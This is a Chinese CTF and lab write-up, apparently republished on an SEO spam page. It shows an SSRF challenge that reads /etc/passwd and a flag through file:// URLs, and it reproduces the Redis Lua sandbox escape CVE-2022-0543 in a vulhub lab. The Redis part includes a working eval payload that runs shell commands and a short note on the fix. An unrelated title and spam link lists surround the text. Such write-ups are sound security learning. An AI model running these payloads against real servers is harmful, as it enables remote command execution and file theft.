当前位置: 首页 > news >正文

郑州免费网站制作2023年5月份病毒感染情况

郑州免费网站制作,2023年5月份病毒感染情况,计算机网络技术就业方向有哪些,港珠澳大桥网站建设目录 一、i春秋题目 二、CVE-2022-0543:(redis沙盒逃逸) 漏洞介绍: 漏洞复现: 一、i春秋题目 靶标介绍: Redis 存在代码注入漏洞,攻击者可利用该漏洞远程执行代码。 进入题目:…

目录

一、i春秋题目

二、CVE-2022-0543:(redis沙盒逃逸)

漏洞介绍:

漏洞复现:


一、i春秋题目

靶标介绍:

Redis 存在代码注入漏洞,攻击者可利用该漏洞远程执行代码。

进入题目:

 SSRF漏洞:

后面加上题目给定的网站试试:

 可以跳转到百度页面:

 读取系统文件:IP/?url=file:///etc/passwd 

获取到flag /?url=file:///flag

 flag{e30bd2d5-b4e8-4635-858f-5aac6604cd9c}

二、CVE-2022-0543:(redis沙盒逃逸)

漏洞介绍:

        Redis Labs Redis是美国Redis Labs公司的一套开源的使用ANSI C编写、支持网络、可基于内存亦可持久化的日志型、键值(Key-Value)存储数据库,并提供多种语言的API。

Redis 存在代码注入漏洞,攻击者可利用该漏洞远程执行代码。

漏洞复现:

靶机
使用vulhub靶场: 

使用vulhub靶场安装完成后我们进入到对应目录:cd vulhub/redis/CVE-2022-0543/然后执行命令,进行靶场编译和运行docker-compose build
docker-compose up -d
运行完docker-compose后,打开我们的redis就是我们的漏洞环境了

先安装redis-cli:

kali安装redis-cli:apt-get update && apt-get upgrade  (更新源)apt install redis-tools

 redis-cli:

redis-cli -h 192.168.184.177//有漏洞IP

产生原因:

        该漏洞的存在是因为Debian/Ubuntu中的Lua库是作为动态库提供的。自动填充了一个package变量,该变量又允许访问任意 Lua 功能。

        我们借助Lua沙箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。在Lua中执行这个导出函数,即可获得io库,再使用其执行命令:

local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io");local io = io_l();local f = io.popen("id", "r");local res = f:read("*a");f:close();return res


Payload: (执行命令id可以改变)

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0

 id命令:

 whoami    pwd   ls  

 到这我们就可以执行命令了。

正式修复方案:Lua 初始化的末尾添加package=nil 

临时修复方案:关闭服务

http://www.tj-hxxt.cn/news/48202.html

相关文章:

  • 搭建个人网站赚钱百度导航怎么下载
  • 免费网站模板下载网站搜索引擎排名中国
  • 商丘网站建设费用怎么引流推广自己的产品
  • 东莞网站制作百年百度广告代理商
  • 网络服务商基本网络参数seo排名关键词搜索结果
  • 怎么做自己的网站卖东西网络营销与直播电商怎么样
  • 专业网站改版网络推广中心
  • win服务器做网站电脑培训班
  • 蓝牙音箱东莞网站建设seo优化专员工作内容
  • 策划方案万能模板seo关键词推广话术
  • Wordpress订阅栏目seo与sem的关系
  • 通信管理局网站备案济南seo怎么优化
  • 南京疫情今天最新情况地址查询深圳网站seo公司
  • 有什么有趣的网站长沙网站seo优化公司
  • 如何帮别人推广赚钱济南seo外包服务
  • 注册公司的流程图页面关键词优化
  • 如何外贸seo网站建设seo关键词优化软件官网
  • 虚拟机wordpress教程视频搜索引擎排名优化建议
  • 电商网站建设任务分解结构抖音seo关键词排名技术
  • 一个人做网站好做吗山西网络营销外包
  • 大连模板开发建站百度搜索排名优化
  • 承德市建设工程交易中心网站网络营销的五个发展阶段
  • 没有备案的网站可以做淘宝客深圳网络推广方法
  • 柬埔寨做博彩网站seo公司费用
  • 网站设计制作的服务机构网站开发一般多少钱
  • 阳江网站制作建设潍坊关键词优化平台
  • asp.net mvc 做网站线上营销平台
  • 湘阴网站建设今日广州新闻最新消息
  • 网站开发报价说明谷歌seo网站优化
  • 关键词查找seo外包公司是啥